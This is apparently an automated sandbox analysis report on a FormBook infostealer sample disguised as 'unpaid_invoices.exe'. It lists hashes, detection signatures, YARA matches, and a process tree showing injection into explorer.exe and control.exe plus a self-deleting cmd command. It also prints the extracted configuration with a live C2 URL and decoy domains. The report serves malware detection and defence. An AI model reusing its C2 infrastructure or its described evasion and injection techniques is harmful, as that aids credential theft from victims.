Windows Analysis Report
unpaid_invoices.exe

Overview

General Information

Sample Name: unpaid_invoices.exe
Analysis ID: 626537
MD5: fa28e3d61ae49fda627abfc78ca84dea
SHA1: 7ecf93e5d4a2873a10510d007b33b4c3460b29d5
SHA256: a7162eb3744c8a0629f9c3967700bf4e015e807340c4e1be3327011a637108c4
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • unpaid_invoices.exe (PID: 6264 cmdline: "C:\Users\user\Desktop\unpaid_invoices.exe" MD5: FA28E3D61AE49FDA627ABFC78CA84DEA)
    • ronkhfyq.exe (PID: 6300 cmdline: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq MD5: 66039B0CB9E9C76FD4CFEA6E9D2B130C)
      • ronkhfyq.exe (PID: 6328 cmdline: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq MD5: 66039B0CB9E9C76FD4CFEA6E9D2B130C)
        • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • control.exe (PID: 260 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
            • cmd.exe (PID: 3840 cmdline: /c del "C:\Users\user\AppData\Local\Temp\ronkhfyq.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • explorer.exe (PID: 3080 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup
{"C2 list": ["www.beamaster.info/p0ip/"], "decoy": ["webberkerr.com", "lelezhuanshu.xyz", "weedformellc.com", "ikzoekeenbedrijfsruimte.com", "swahlove.com", "dubaidesertsafari.travel", "atozmedicalimages.com", "uniytriox.com", "clickyourcat.com", "shandun-safety.com", "pakmart.center", "roxxiesixx.com", "twistedtaqueriachicago.com", "studynursingaustralia.online", "wellnesstestinggroup.com", "justusebias.com", "yqvzs.com", "co1l7o8vy.com", "lightning.legal", "cardamagescanner.com", "megawatchinc.com", "sadebademli.com", "bcoky.com", "unleashingyou-lifecoaching.com", "epsubtitles.online", "susanpetersonrealty.com", "gdderui.com", "claris-studio.cloud", "cryptomnis.com", "1ens.domains", "localbusinessassets.com", "et9n7e4vf.com", "quoteypants.com", "bokepremaja18.biz", "xiangqinmao.com", "lilot-pland45.site", "exilings.com", "nft-id.net", "sport-outdoorpacks.com", "plnykosik.online", "cidesadelcentro.com", "stunning-black.xyz", "zoeyunker.com", "videogamesgroup.com", "autodnstest.com", "bookworms.store", "69817269.com", "one-session22-lp.com", "modelofindia.com", "kennnyshands.com", "otopenishop.net", "freegameswithoutdownload.online", "alaskanwave.net", "tjkt8.com", "abv.wiki", "protoncarsale.com", "zhipurc.com", "psicologamoderna.com", "hidinginplainsight.digital", "cuamini-trankien.xyz", "yustunning.com", "apeironpay.xyz", "allowdrops.xyz", "allyouneedstore.xyz"]}
Source | Rule | Description | Author | Strings
00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18809:$sqlite3step: 68 34 1C 7B E1
    • 0x1891c:$sqlite3step: 68 34 1C 7B E1
    • 0x18838:$sqlite3text: 68 38 2A 90 C5
    • 0x1895d:$sqlite3text: 68 38 2A 90 C5
    • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x6335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x5de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x6437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x65af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb987:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Source | Rule | Description | Author | Strings
      1.2.ronkhfyq.exe.d80000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        1.2.ronkhfyq.exe.d80000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8192:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15535:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14fe1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15637:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x157af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x8baa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1425c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9922:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bc8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.ronkhfyq.exe.d80000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17a09:$sqlite3step: 68 34 1C 7B E1
        • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a38:$sqlite3text: 68 38 2A 90 C5
        • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
        2.2.ronkhfyq.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          2.2.ronkhfyq.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          No Sigma rule has matched
          No Snort rule has matched

          AV Detection

          Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed above)
          Source: Yara match, File source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: www.beamaster.info/p0ip/, Avira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe, Virustotal: Detection: 34%
          Source: unpaid_invoices.exe, Joe Sandbox ML: detected
          Source: 1.2.ronkhfyq.exe.d80000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.ronkhfyq.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.ronkhfyq.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.ronkhfyq.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.ronkhfyq.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: unpaid_invoices.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: unpaid_invoices.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: ronkhfyq.exe, 00000001.00000003.234061206.000000001A710000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000001.00000003.237833298.000000001A8A0000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.239686577.0000000000E36000.00000004.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303340292.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303914689.00000000010EF000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.238238247.0000000000B9E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.303050048.0000000003204000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.304479870.0000000004A09000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: ronkhfyq.exe, 00000002.00000002.303244940.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303149130.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ronkhfyq.exe, 00000001.00000003.234061206.000000001A710000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000001.00000003.237833298.000000001A8A0000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.239686577.0000000000E36000.00000004.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303340292.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303914689.00000000010EF000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.238238247.0000000000B9E000.00000004.00000800.00020000.00000000.sdmp, control.exe, control.exe, 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.303050048.0000000003204000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.304479870.0000000004A09000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\yysuo\kzzcum\izya\0db06ea2233046af83ff72ba291e1f8f\exvtus\fxibtxmq\Release\fxibtxmq.pdb source: unpaid_invoices.exe, 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmp, ronkhfyq.exe, 00000001.00000000.229638861.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp, ronkhfyq.exe, 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp, ronkhfyq.exe, 00000002.00000000.235483979.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp, control.exe, 00000011.00000002.499584872.000000000311A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000011.00000002.500336053.00000000050D7000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.462569690.0000000007497000.00000004.80000000.00040000.00000000.sdmp, nss7D29.tmp.0.dr, ronkhfyq.exe.0.dr
          Source: Binary string: control.pdbUGP source: ronkhfyq.exe, 00000002.00000002.303244940.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303149130.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\unpaid_invoices.exe, Code function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D7A
          Source: C:\Users\user\Desktop\unpaid_invoices.exe, Code function: 0_2_004069A4 FindFirstFileW,FindClose,0_2_004069A4
          Source: C:\Users\user\Desktop\unpaid_invoices.exe, Code function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe, Code function: 4x nop then pop edi, 2_2_0040CA02
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe, Code function: 4x nop then pop ebx, 2_2_00406EA4
          Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop edi, 17_2_02EECA02
          Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop ebx, 17_2_02EE6EA5

          Networking

          Source: Malware configuration extractor, URLs: www.beamaster.info/p0ip/
          Source: explorer.exe, 0000001B.00000000.491457253.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.451885872.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.468009786.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.466224505.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.465809176.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.450166228.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.449810104.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.464512993.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.490550575.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.443910972.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.441840899.0000000009B83000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.488161679.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.491255412.0000000009B66000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.491310221.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.493308123.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.491580962.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.493220220.0000000009B66000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.450978989.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.488054487.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.464944706.0000000009B6A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.491957407.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 0000001B.00000003.441376750.0000000009BD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.442769912.0000000009BD0000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.m
          Source: unpaid_invoices.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: C:\Users\user\Desktop\unpaid_invoices.exe, Code function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040580F

          E-Banking Fraud

          Source: Yara match, File source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
